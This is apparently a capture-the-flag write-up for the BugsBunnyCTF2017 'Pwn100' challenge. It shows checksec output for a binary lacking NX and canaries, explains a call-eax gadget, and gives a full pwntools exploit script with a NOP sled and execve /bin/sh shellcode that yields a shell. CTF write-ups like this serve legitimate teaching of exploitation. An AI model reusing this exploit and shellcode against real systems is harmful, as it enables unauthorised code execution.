[BugsBunnyCTF2017]Pwn100 [pwn] [100pts]

This pwn challenge worth 100 points.

$ checksec ./pwn100
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

I used a “call eax” gadget found with ROPgadget, eax points to the start of the payload so I used a little “shellcode” to add 0x32 to esp then call esp to jump in the nopsled, I found the opcodes (“\x83\xC4\x32\xFF\xD4”) with https://defuse.ca/online-x86-assembler.htm 

Here is the exploit code :

#!/usr/bin/env python2

from pwn import *

p = process('./pwn100')
#p = remote("54.153.19.139",5252) 
pause()

payload = "\x83\xC4\x32\xFF\xD4" # add esp,0x32; call esp
payload  += "A"*(28-len(payload))
payload += p32(0x08048386) # call eax gadget
payload += "\x90"*200 # nopsled
payload +=  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
p.sendline(payload)
p.interactive()
exploit.py

We have a shell ! Challenge done !

Leave a Reply

Your email address will not be published.